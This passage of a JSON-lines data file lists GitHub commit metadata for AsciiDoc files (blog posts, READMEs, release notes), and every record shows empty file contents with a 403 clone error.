2017-04-25-Server-Virtualization-Management-Part2.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8fedcdf1f2a1c98abd6b4bb8b1d3e81956d2141","subject":"Released v0.7.0 and updated README","message":"Released v0.7.0 and updated README\n","repos":"RobWin\/circuitbreaker-java8,drmaas\/resilience4j,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,storozhukBM\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"90ec3eaf33338502b3d4f6c6b8f7228a47dd849b","subject":"Add README with basic Build&Run instructions","message":"Add README with basic Build&Run instructions\n","repos":"msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/bitcoinj-addons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ade2219b32c95c0cf35831c816dbd54e2756292","subject":"Adding an (empty) README file","message":"Adding an (empty) README file\n","repos":"jponge\/vertx-gradle-plugin,jponge\/vertx-gradle-plugin,jponge\/vertx-gradle-plugin,jponge\/vertx-gradle-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jponge\/vertx-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19b47c1a65f49c436a1e2aca08050ad0cdee5c75","subject":"test links","message":"test links\n","repos":"mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3350688ae7945fdfcc5f711e07b9cecbe5d2549d","subject":"add readme","message":"add readme\n","repos":"araraloren\/Net-FTPlib,araraloren\/Net-FTPlib","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araraloren\/Net-FTPlib.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b0958bbac6ce555618e6fb9a0abeb6af4f9782e","subject":"Updated to the new bridge_common repository path","message":"Updated to the new bridge_common repository path\n","repos":"r0h4n\/node-agent,Tendrl\/node_agent,Tendrl\/node_agent,Tendrl\/node-agent,Tendrl\/node-agent,r0h4n\/node-agent,r0h4n\/node-agent,Tendrl\/node-agent","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/r0h4n\/node-agent.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"f96198504551ef4d785e7149a574b68a4cf6ff78","subject":"Create README.adoc","message":"Create 
README.adoc\n","repos":"teacurran\/personal-api,teacurran\/personal-api,teacurran\/personal-api","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teacurran\/personal-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d453415abd0e697704c896fcb0261f4869c46e27","subject":"readme","message":"readme\n","repos":"harsha-mudi\/rdp,harsha-mudi\/rdp,harsha-mudi\/rdp-js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harsha-mudi\/rdp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a6beb7c0f4d389db0e93f8d36135b1aabf9c4f6","subject":"Update 2016-07-14-Testing-Getting-closer.adoc","message":"Update 2016-07-14-Testing-Getting-closer.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-07-14-Testing-Getting-closer.adoc","new_file":"_posts\/2016-07-14-Testing-Getting-closer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d02e63c6520bade41cdf3dc3bcda7cf6216be84","subject":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","message":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f15160ac65fdd9d433daa666b059d6cb7acfed4","subject":"Update 2017-06-12-neural_networks_training_basics.adoc","message":"Update 2017-06-12-neural_networks_training_basics.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cc79f698081defe2d91a1794526fd7dc0790b01","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6193e65734d1abe91fb2a07c586b7d2747866b70","subject":"Update 2017-11-19-.adoc","message":"Update 
2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fda55718a860379784433a93bd718b0cc6deccc5","subject":"Publish 2013-5-12-Test-Notes.adoc","message":"Publish 2013-5-12-Test-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2013-5-12-Test-Notes.adoc","new_file":"2013-5-12-Test-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb6474cb88b4d2a665f7dce879130512d96c1813","subject":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad7ad38c45f34025b5b026f49b163940caeef430","subject":"release notes improvements","message":"release notes improvements\n","repos":"bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,bibryam\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.0.adoc","new_file":"download\/releaseNotes\/releaseNotes6.0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ccd507c985d6154dfe023586296125f3b544950","subject":"Update 2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","message":"Update 2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","new_file":"_posts\/2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"232e4509291832b10f4576baaf012ff902cc6c00","subject":"Correct user guide env->profile","message":"Correct user guide 
env->profile\n","repos":"mstine\/spring-cloud-config,royclarkson\/spring-cloud-config,marbon87\/spring-cloud-config,marbon87\/spring-cloud-config,rajkumargithub\/spring-cloud-config,appleman\/spring-cloud-config,psbateman\/spring-cloud-config,fkissel\/spring-cloud-config,thomasdarimont\/spring-cloud-config,spring-cloud\/spring-cloud-config,psbateman\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,fangjing828\/spring-cloud-config,fkissel\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,thomasdarimont\/spring-cloud-config,royclarkson\/spring-cloud-config,spring-cloud\/spring-cloud-config,appleman\/spring-cloud-config,royclarkson\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,shakuzen\/spring-cloud-config,spring-cloud\/spring-cloud-config,mstine\/spring-cloud-config,shakuzen\/spring-cloud-config,fangjing828\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mbenson\/spring-cloud-config,shakuzen\/spring-cloud-config,mbenson\/spring-cloud-config,appleman\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c39b576e165509a253fdc888684e565fa1d6dc9","subject":"Update 2015-11-25-Migra-tu-usuario-entre-servidores-Linux.adoc","message":"Update 2015-11-25-Migra-tu-usuario-entre-servidores-Linux.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-25-Migra-tu-usuario-entre-servidores-Linux.adoc","new_file":"_posts\/2015-11-25-Migra-tu-usuario-entre-servidores-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e808fe440c56c0e711710d6ddf314b35672bc8c5","subject":"Update 2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc","message":"Update 2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc","new_file":"_posts\/2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae271d2b4b7a02b852c0361c67f45df53a4b9fe7","subject":"Update 2017-12-29-work-it-on-not.adoc","message":"Update 2017-12-29-work-it-on-not.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-12-29-work-it-on-not.adoc","new_file":"_posts\/2017-12-29-work-it-on-not.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"28348aa845a52f7239a4c2baf301e4c38399c506","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f81f3fb4196ed553f94141e51a17f5a8ded8bd89","subject":"y2b create post HTC One X+ Unboxing \\u0026 Overview","message":"y2b create post HTC One X+ Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-03-HTC-One-X-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-01-03-HTC-One-X-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2155978838ab985f70f71666cd210bef96b9955","subject":"add pydoc_links.adoc","message":"add pydoc_links.adoc\n","repos":"jerodg\/hackerrank-python","old_file":"pydoc_links.adoc","new_file":"pydoc_links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jerodg\/hackerrank-python.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba74f803bbc9103be526da20a0a83d019e4fd900","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddc7b8a2fa129192a9f2fca6561d17959f6628b5","subject":"Update 2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","message":"Update 2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_file":"_posts\/2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5464d19f3a39e6f8a83ae1c16593a17141f3da7c","subject":"adding some clarifications","message":"adding some 
clarifications\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2ef781d4813ae6c390a2825fb412dd6b276b70d","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b68c48d2c6e9204a51f3875d9370869789625f62","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d0fb503142103a36968206bf9727e55144bef9c","subject":"doc v2.27 release notes","message":"doc v2.27 release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c439d054eb1ee3f123d087297410eb140b9b2149","subject":"Update 2016-10-02-Simple-Comforting-Granola.adoc","message":"Update 2016-10-02-Simple-Comforting-Granola.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-10-02-Simple-Comforting-Granola.adoc","new_file":"_posts\/2016-10-02-Simple-Comforting-Granola.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7fe866fff42ba3af48324e9cb8ec062f97d6893","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 
2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bcc9931d5724f02734803baed15024ea1516b99","subject":"Update 2017-05-24-Pwnablekr-UAF-Writeup.adoc","message":"Update 2017-05-24-Pwnablekr-UAF-Writeup.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Pwnablekr-UAF-Writeup.adoc","new_file":"_posts\/2017-05-24-Pwnablekr-UAF-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0aef923e4928d7d404f7bc882b40aa639f7d8f0","subject":"Added Eips directory in camel-core and added Aggregate doc page","message":"Added Eips directory in camel-core and added Aggregate doc page\n","repos":"acartapanis\/camel,tlehoux\/camel,RohanHart\/camel,acartapanis\/camel,NickCis\/camel,lburgazzoli\/camel,akhettar\/camel,gnodet\/camel,mcollovati\/camel,lburgazzoli\/camel,Fabryprog\/camel,driseley\/camel,objectiser\/camel,RohanHart\/camel,nboukhed\/camel,chirino\/camel,akhettar\/camel,snurmine\/camel,nboukhed\/camel,gnodet\/camel,punkhorn\/camel-upstream,pax95\/camel,isavin\/camel,DariusX\/camel,rmarting\/camel,objectiser\/camel,dmvolod\/camel,drsquidop\/camel,driseley\/camel,yuruki\/camel,gnodet\/camel,dmvolod\/camel,tdiesler\/camel,lburgazzoli\/camel,drsquidop\/camel,tadayosi\/camel,cunningt\/camel,Thopap\/camel,rmarting\/camel,driseley\/camel,pax95\/camel,pkletsko\/camel,mgyongyosi\/camel,mgyongyosi\/camel,prashant2402\/camel,nicolaferraro\/camel,anton-k11\/camel,tadayosi\/camel,gnodet\/camel,sverkera\/camel,jkorab\/camel,mgyongyosi\/camel,CodeSmell\/camel,lburgazzoli\/apache-camel,jamesnetherton\/camel,lburgazzoli\/camel,allancth\/camel,akhettar\/camel,pmoerenhout\/camel,lburgazzoli\/apache-camel,jkorab\/camel,isavin\/camel,snurmine\/camel,zregvart\/camel,chirino\/camel,RohanHart\/camel,lburgazzoli\/apache-camel,yuruki\/camel,drsquidop\/camel,anoordover\/camel,akhettar\/camel,alvinkwekel\/camel,onders86\/camel,drsquidop\/camel,sverkera\/camel,chirino\/camel,Thopap\/camel,tadayosi\/camel,pax95\/camel,tadayosi\/camel,alvinkwekel\/camel,curso007\/camel,tdiesler\/camel,zregvart\/camel,sverkera\/camel,NickCis\/camel,pmoerenhout\/camel,kevinearls\/camel,Fabryprog\/camel,RohanHart\/camel,allancth\/camel,tdiesler\/camel,CodeSmell\/camel,scranton\/camel,pkletsko\/camel,curso007\/camel,jonmcewen\/camel,apache\/camel,christophd\/camel,lburgazzoli\/camel,isavin\/camel,mcollovati\/camel,mgyongyosi\/camel,DariusX\/camel,dmvolod\/camel,tdiesler\/camel,akhettar\/camel,chirino\/camel,prashant2402\/camel,ullgren\/camel,pmoerenhout\/camel,davidkarlsen\/camel,rmarting\/camel,onders86\/camel,Thopap\/camel,nikhilvibhav\/camel,rmarting\/camel,NickCis\/camel,nicolaferraro\/camel,prashant2402\/camel,cunningt\/camel,lburgazzoli\/camel,Thopap\/camel,nicolaferraro\/camel,kevinearls\/camel,nikhilvibhav\/camel,mcollovati\/camel,kevinearls\/camel,driseley\/camel,onders86\/camel,kevinearl
s\/camel,jonmcewen\/camel,christophd\/camel,cunningt\/camel,jamesnetherton\/camel,sverkera\/camel,apache\/camel,anton-k11\/camel,zregvart\/camel,objectiser\/camel,adessaigne\/camel,apache\/camel,lburgazzoli\/apache-camel,CodeSmell\/camel,CodeSmell\/camel,christophd\/camel,isavin\/camel,nboukhed\/camel,acartapanis\/camel,jkorab\/camel,christophd\/camel,yuruki\/camel,yuruki\/camel,adessaigne\/camel,DariusX\/camel,davidkarlsen\/camel,acartapanis\/camel,gautric\/camel,curso007\/camel,prashant2402\/camel,drsquidop\/camel,anoordover\/camel,isavin\/camel,NickCis\/camel,objectiser\/camel,RohanHart\/camel,snurmine\/camel,dmvolod\/camel,jonmcewen\/camel,snurmine\/camel,chirino\/camel,onders86\/camel,tlehoux\/camel,alvinkwekel\/camel,anoordover\/camel,mgyongyosi\/camel,acartapanis\/camel,kevinearls\/camel,cunningt\/camel,scranton\/camel,tlehoux\/camel,allancth\/camel,pax95\/camel,mgyongyosi\/camel,driseley\/camel,Thopap\/camel,Fabryprog\/camel,lburgazzoli\/apache-camel,pax95\/camel,jonmcewen\/camel,punkhorn\/camel-upstream,anton-k11\/camel,drsquidop\/camel,onders86\/camel,nboukhed\/camel,pmoerenhout\/camel,gautric\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,yuruki\/camel,jamesnetherton\/camel,apache\/camel,pax95\/camel,isavin\/camel,curso007\/camel,pkletsko\/camel,cunningt\/camel,mcollovati\/camel,sverkera\/camel,cunningt\/camel,lburgazzoli\/apache-camel,adessaigne\/camel,tlehoux\/camel,snurmine\/camel,adessaigne\/camel,scranton\/camel,jonmcewen\/camel,tlehoux\/camel,apache\/camel,salikjan\/camel,driseley\/camel,zregvart\/camel,christophd\/camel,yuruki\/camel,pkletsko\/camel,snurmine\/camel,tlehoux\/camel,pmoerenhout\/camel,davidkarlsen\/camel,christophd\/camel,NickCis\/camel,NickCis\/camel,alvinkwekel\/camel,jkorab\/camel,pkletsko\/camel,pkletsko\/camel,nikhilvibhav\/camel,gautric\/camel,jkorab\/camel,jonmcewen\/camel,chirino\/camel,scranton\/camel,allancth\/camel,onders86\/camel,gautric\/camel,anton-k11\/camel,anton-k11\/camel,scranton\/camel,tadayosi\/camel,jamesnetherton\/camel,ullgren\/camel,nboukhed\/camel,anoordover\/camel,dmvolod\/camel,jamesnetherton\/camel,anoordover\/camel,tdiesler\/camel,gautric\/camel,adessaigne\/camel,DariusX\/camel,ullgren\/camel,curso007\/camel,Thopap\/camel,jkorab\/camel,gautric\/camel,RohanHart\/camel,nicolaferraro\/camel,rmarting\/camel,scranton\/camel,Fabryprog\/camel,tadayosi\/camel,allancth\/camel,nikhilvibhav\/camel,anoordover\/camel,allancth\/camel,punkhorn\/camel-upstream,sverkera\/camel,jamesnetherton\/camel,anton-k11\/camel,ullgren\/camel,acartapanis\/camel,dmvolod\/camel,salikjan\/camel,nboukhed\/camel,prashant2402\/camel,prashant2402\/camel,akhettar\/camel,rmarting\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,curso007\/camel,kevinearls\/camel,gnodet\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/aggregate-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/aggregate-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"656e5dde40a98707220f6c2046246e98a6cd1e02","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 
2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d962094ef1e8c1fec46c440881d519dc760f55f8","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/Windows Search.asciidoc","new_file":"documentation\/Windows Search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17599f000af3d40bc7901d6e694d1222be1c8677","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 